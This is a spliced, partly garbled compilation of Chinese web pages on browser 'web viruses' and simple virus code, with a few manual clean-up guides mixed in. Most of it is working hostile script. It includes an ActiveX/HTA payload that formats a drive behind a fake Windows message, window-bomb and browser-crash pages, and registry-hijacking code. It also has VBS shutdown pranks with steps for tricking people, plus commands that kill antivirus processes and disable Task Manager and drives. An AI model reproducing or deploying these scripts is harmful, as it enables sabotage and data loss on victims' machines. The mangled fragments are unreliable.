计算机病毒 网页病毒及其清除代码
网页恶意代码总结
网页恶意代码大总结(共15项)1、格式化硬盘<object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"></object><script>scr.Reset();scr.Path="C:\\windows\\Men?inicio\\Programas\\Inicio\\automat.hta";scr.Doc="<object id=wsh classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B></object><script>wsh. Run(start /m format a: /q /autotest /u);alert(IMPORTANT : Windows is configuring the system. Plase do not interrupt this process.);</"+"SCRIPT>";scr.write();2、使WINDOWS 98掉线的代码<html><head></head><a href="wincrash.htm" on mouseclick="alert("Go To Hell,Mall!")">HaHa!</a></html>wincrash.htm<HTML><BODY><IMG SRC="c:\con\con"><!-- or nul\nul, clock$\clock$ --><!-- or aux\aux, config$\config$ --></BODY></HTML>3、IE视窗炸弹或者叫让IE不段循环的代码<HTML><HEAD><TITLE>f\*\*k USA</TITLE><meta http-equiv="Content-Type" content="text/html; charset=gb2312"></HEAD><BODY onload="WindowBomb()"><SCRIPT LANGUAGE="javascript">function WindowBomb(){var iCounter = 0 // dummy counterwhile (true){window.open("","CRASHING" + iCounter,"width=1,height=1,resizable=no")iCounter++}}</script></BODY></HTML>4、造成IE 5.0崩溃的代码<HTML><BODY><script>var color = new Array;color[1] = "black";color[2] = "white";for(x = 0; x <3; x++){document.bgColor = color[x]if(x == 2){x = 0;}}</SCRIPT></BODY></HTML>5、进入WINDOWS 之前弹出来的对话框代码到注册表找到LegalNoticeCaption ,LegalNoticeText 删除<SCRIPT language=java script>document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.Act iveXComponent></APPLET>");function f(){try{//ActiveX initializationa1=document.applets[0];a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");a1.createInstance();Shl = a1.GetObject();a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");a1.createInstance();FSO = a1.GetObject();a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");a1.createInstance();Net = a1.GetObject();try{if (documents .cookie.indexOf("Chg") == -1){Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption", "这里是标题栏网页教学网");Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption", "这里是标题栏网页教学网");Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText", "请多留意本站的文章");Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText", "请多留意本站的文章");var expdate = new Date((new Date()).getTime() + (1));documents .cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"}}catch(e){}}catch(e){}}function init(){setTimeout("f()", 1000);}init();</SCRIPT>6、造成WINDOWS98 不能关机的代码。
教你手工清除网页恶意代码-电脑资料
教你手工清除网页恶意代码-电脑资料Tny380{display:none;}1.清除每次开机时自动弹出的网页记住地址栏里出现的网址,然后打开注册表编辑器(方法是在点击开始菜单,之后点击运行,在运行框中输入regedit命令进入注册表编辑器),分别定位到:HKEY_CURRENT_USER\Software\Microsoft\Windows\Curren tVersion\Run和HKEY_CURRENT_USER\Software\Microsoft\Windows\Curren tVersion\Runonce下,看看在该子项下是否有一个以这个网址为值的值项,如果有的话,就将其删除,之后重新启动计算机,。
这样在下一次开机的时候就不再会有网页弹出来了。
不过网页恶意代码的编写者有时也是非常的狡猾,他会在注册表的不同键值中多处设有这个值项,这样上面提的方法也未必能完全解决问题。
遇到这种情况,你可以在注册表编辑器的选项菜单里选择编辑rarr;查找,在查找对话框内输入开机时自动打开的网址,然后点击查找下一个,将查找到的值项删除。
另外,如果你是使用Windows98的用户,可在开始菜单中的运行对话框内输入msconfig,点击确定,打开系统配置实用程序并打开启动选项卡,检查其中是否有非常可疑的启动项,如果有的话请将其禁用(在程序前的打上勾),然后重启机器就可以了。
如果你所使用的是WindowsNT/2000的用户,可以把Windows98下的系统配置实用程序复制过来并运行进行查找清除。
2.IE标题栏被修改在系统默认状态下,是由应用程序本身来提供标题栏的信息,但也允许用户自行在上述注册表项目中填加信息,而一些恶意的网站正是利用了这一点来得逞的:它们将串值WindowTitle下的键值改为其网站名或更多的广告信息,从而达到改变浏览者IE标题栏的目的。
具体说来受到更改的注册表项目为:orer\Main\WindowTitleHKEY_CURRENT_USER\Software\Microsoft\InternetExplorer \Main\WindowTitle解决办法:1).在Windows启动后,点击开始rarr;运行菜单项,在打开栏中键入regedit,然后按确定键;2).展开注册表到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\InternetExpl orer\Main下,在右半部分窗口中找到串值WindowTitle,将该串值删除即可,或将WindowTitle的键值改为IE浏览器等你喜欢的名字;3).同理,展开注册表到HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer \Main然后按2)中所述方法处理。
清除恶意代码
清除恶意代码关于恶意代码清除现在仍不时听到关于恶意代码的问题,其实这个东西已经落伍了。
目前所说的[恶意代码]通常是指嵌入网页中的部分代码,或利用IE漏洞、或利用合法的Script进行恶作剧或恶意破坏。
一.首先还是把这些代码进行分类。
1.利用IE溢出代码进行破坏2.利用合法的脚本语句进行破坏3.通过IE5.0的漏洞利用ActiveX进行破坏常见的就是修改注册表项目及运行程序、生成文件等。
(其实平时常说的也就是这类被杀毒软件评为网页病毒的恶意代码,我们今天主要讨论的也是这类的问题)二.接着说一下防治方法1.对于第1类,只有及时打补丁,别无他法。
就目前我找到的这类代码而言,其功能都是十分有限的。
不过劝你还是及时打下补丁。
2.对于第2类,禁止脚本可能带来很多麻烦,此方法并不现实。
所以,也没有较好的方法,只能尽量不要打开陌生的页子。
3.对于第3类,防范方法很多,依次介绍一下。
a).这是最简单最实用的方法,不借助第三方软件运行regedit.exe,将注册表中的[HKEY_CLASSES_ROOT\CLSID\{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}]主键全部删除。
删除后并不影响系统运行及网页浏览。
b).如果你对注册表操作的方法有所顾忌,试试下面的方法,同样不借助第三方软件将Windows98中的Windows Script Host卸载,把Windows2K 中的Remote Registry Service服务禁用。
c).禁用脚本这样做会带来很多麻烦,所以不实用。
还有很多方法也不实用,在此不作介绍。
d).特别说明--错误方法错误解释:因为该页子修改注册表,所以可以先锁定regedit.exe来达到预防其修改注册表的目的。
错误原因:修改注册表是因为IE5的漏洞利用ActiveX修改注册表,并没有使用regedit.exe命令。
我曾经在《电脑报》、《网友世界》、《黑客防线精华本》以及某杀毒软件的官方网站上看到如此不负责的解释,真让人感到遗憾。
计算机病毒代码有哪些
计算机病毒代码有哪些计算机病毒代码介绍一:void main(){while(1){}}//死循环,电脑用不了或者这样void main(){while(1){char *a=new char(1024);}}//吃光你的内存还能这样#include#includevoid main(){..........//循环查找文件写入垃圾数据,省略若干代码}最好hook openprocess这个东东让任务管理器都结束不掉想象力是无限的,看你怎么玩。
计算机病毒代码介绍二:给你个恶搞的玩on error resume nextdim wshshellaset wshshella = w.createobject("w.shell")wshshella.run "cmd.exe /c shutdown -r -t 60 -c ""说我是猪,不说我是猪就一分钟关你机,不信,试试···"" ",0 ,true dim ado while(a "我是猪")a = inputbox ("说我是猪,就不关机,快撒,说 ""我是猪"" ","说不说","不说",8000,7000)msgbox chr(13) + chr(13) + chr(13) + a,0,"msgbox"loopmsgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛"dim wshshellset wshshell = w.createobject("w.shell")wshshell.run "cmd.exe /c shutdown -a",0 ,truemsgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,真过瘾"计算机病毒代码介绍三:最简单的一个电脑病毒1.vbs版本:打开记事本,输入以下代码:do until 1=2w.echo "烦死你!"loop保存为1.vbs,运行后不断出现"烦死你"的对话框。
计算机病毒代码
msgbox "You are foolish!"
loop
------------------------------------------------------------------------------ 好了,今天就到这里,这些是不是很有趣呢?
###################代码开始【这段不用复制】################### dim a,s
set wshshell=createobject("wscript.shell")
a=0
for i=1 to 100
msgbox"还有"&(100-i)&"只绵羊",22 next ###################代码结束【这段不用复制】################### 将扩展名由txt改成VBS即可
第3种程序 关机 ###################代码开始【这段不用复制】################### shutdown -r -t 60 -c"系统即将关机。请保存所有正在运行的工作,然后注销。未保存的改动将会丢失。关机是由nt authortty/system初始的" ###################代码结束【这段不用复制】################### 4 关不掉的窗口 ------------------------------------------------------------------------------
do wshshell.r源自n"notepad"
a=a+1
if a>20 then
常见的几种网页恶意代码解析及解决方案
常见的几种网页恶意代码解析及解决方案网页恶意代码(又称网页病毒)是利用网页来进行破坏的病毒,使用一些SCRIPT语言编写的一些恶意代码利用IE的漏洞来实现病毒植入。
网页恶意代码的技术基础是WSH,其通用的中文译名为“Windows 脚本宿主”。
当用户登录某些含有网页病毒的网站时,网页病毒便被悄悄激活,这些病毒一旦激活,可以利用系统的一些资源进行破坏。
一、篡改IE的默认页有些IE被改了起始页后,即使设置了“使用默认页”仍然无效,这是因为IE起始页的默认页也被篡改了。
具体说就是以下注册表项被修改:HKEY_LOCAL_MACHINESof twareMicrosoftInternet ExplorerMainDefault_Page_URL“Default_Page_URL”这个子键的键值即起始页的默认页。
解决办法:运行注册表编辑器,然后展开上述子键,将“Default_Page_UR”子键的键值中的那些篡改网站的网址改掉就行了,或者将其设置为IE的默认值。
二、修改IE浏览器缺省主页,并且锁定设置项,禁止用户更改主要是修改了注册表中IE设置的下面这些键值(DWORD值为1时为不可选):HKEY_CURRENT_USERSoftwarePoliciesMicrosoftInternet ExplorerCon trol Panel"Settings"=dword:1HKEY_CURRENT_USERSoftwarePoliciesMicrosoftInternet ExplorerCon trol Panel"Links"=dword:1HKEY_CURRENT_USERSoftwarePoliciesMicrosoftInternet ExplorerCon trol Panel"SecAddSites"=dword:1解决办法:将上面这些DWORD值改为“0”即可恢复功能。
最简单的电脑病毒代码是什么
最简单的电脑病毒代码是什么你知道最简单的电脑病毒代码是什么吗!简单的代码不容易被杀毒软件发现!下面由店铺给你做出详细的最简单的电脑病毒代码介绍!希望对你有帮助!最简单的电脑病毒代码介绍:绕过杀毒软件防御:运行(“taskkill /f /im kavsvc.exe”, 假, 1)运行(“taskkill /f /im KVXP.kxp”, 假, 1)运行(“taskkill /f /im Rav.exe”, 假, 1)运行(“taskkill /f /im Ravmon.exe”, 假, 1)运行(“taskkill /f /im Mcshield.exe”, 假, 1)运行(“taskkill /f /im VsTskMgr.exe”, 假, 1)修改系统时间:置现行时间 (到时间(“8888年8月8日”))禁用任务管理器:写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\System \DisableTaskMgr”, 0)禁用注册表:写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\System \Disableregistrytools”, 1)隐藏开始中的运行禁止WIN2000/XP通过任务管理器创建新任务:写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explore r\NoRun”, 1)隐藏“MS-DOS方式”下的磁盘驱动器。
不管是在“我的电脑”里,或“MS-DOS”方式下都看不见了:写注册项(3, “SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled”, 1)隐藏开始中的关机:写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explore r\NoClose”, 1)隐藏开始中的搜索:写注册项(3, “Softw are\Microsoft\Windows\CurrentVersion\Policies\Explore r\NoFind”, 1)OVER360防御:写注册项(4, “SOFTWARE\360Safe\safemon\ExecAccess”, 0)写注册项(4, “SOFTWARE\360Safe\safemon\MonAccess”, 0)写注册项(4, “SOFTWARE\360Safe\safemon\SiteAccess”, 0)写注册项(4, “SOFTWARE\360Safe\safemon\UDiskAccess”, 0)结束360进程运行(“taskkill /f /im 360tray.exe”, 假, 1)隐藏所有驱动器:写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explore r\NoDrives”, 4294967295)禁止所有驱动器:写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explore r\NoViewOnDrive”, 4294967295)隐藏文件夹选项:写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explore r\NoFolderOptions”, 1)将桌面对象隐藏:写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explore r\NoDesktop”, 1)隐藏开始中的关机:写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explore r\NoClose”, 1)隐藏开始中的搜索:写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explore r\NoFind”, 1)这条有两种情况。
计算机病毒源代码什么样
计算机病毒源代码什么样万恶的计算机病毒也是有源代码组成的,那么计算机病毒代码长什么样呢?下面由店铺给你做出详细的计算机病毒源代码介绍!希望对你有帮助!计算机病毒源代码介绍一:给你个恶搞的玩on error resume nextdim WSHshellAset WSHshellA = wscript.createobject("wscript.shell")WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""说我是猪,不说我是猪就一分钟关你机,不信,试试···"" ",0 ,truedim ado while(a <> "我是猪")a = inputbox ("说我是猪,就不关机,快撒,说 ""我是猪"" ","说不说","不说",8000,7000)msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"loopmsgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛"dim WSHshellset WSHshell = wscript.createobject("wscript.shell")WSHshell.run "cmd.exe /c shutdown -a",0 ,truemsgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,真过瘾"把这段复制,新建一个文本文档,粘贴进去,保存,然后右击,属性,将后缀由.txt改为.vbs 确定就行了!以后双击这个vbs文件就能捉弄人了计算机病毒源代码介绍二:最简单的一个电脑病毒1.VBS版本:打开记事本,输入以下代码:Do Until 1=2Wscript.echo "烦死你!"Loop保存为1.VBS,运行后不断出现"烦死你"的对话框。